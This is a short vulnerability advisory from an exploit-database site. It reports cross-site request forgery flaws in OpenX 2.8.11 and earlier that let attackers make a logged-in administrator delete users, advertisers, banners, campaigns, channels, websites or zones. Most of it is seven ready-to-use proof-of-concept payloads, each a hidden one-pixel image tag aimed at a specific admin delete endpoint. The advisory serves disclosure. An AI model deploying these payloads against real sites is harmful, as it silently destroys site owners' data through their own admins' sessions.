OpenX 2.8.11 Cross Site Request Forgery

2014.03.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Hello, Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2.8.11and earlier allows remote attackers to hijack the authentication of administrators for requests that delete (1) users, (2) advertisers, (3) banners, (4) campaigns, (5) channels, (6) websites or (7) zones via delete actions. File: admin/agency-user-unlink.php POC: <img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18' width="1" height="1" border="0"> File: admin/advertiser-delete.php POC: <img src='http://site/admin/advertiser-delete.php?clientid=10' width="1" height="1" border="0"> File: admin/banner-delete.php POC: <img src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16' width="1" height="1" border="0"> File: admin/campaign-delete.php POC: <img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11' width="1" height="1" border="0"> File: admin/channel-delete.php POC: <img src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6' width="1" height="1" border="0"> File: admin/affiliate-delete.php POC: <img src='http://site/admin/affiliate-delete.php?affiliateid=9' width="1" height="1" border="0"> File: admin/zone-delete.php POC: <img src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11' width="1" height="1" border="0"> Best regards.


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top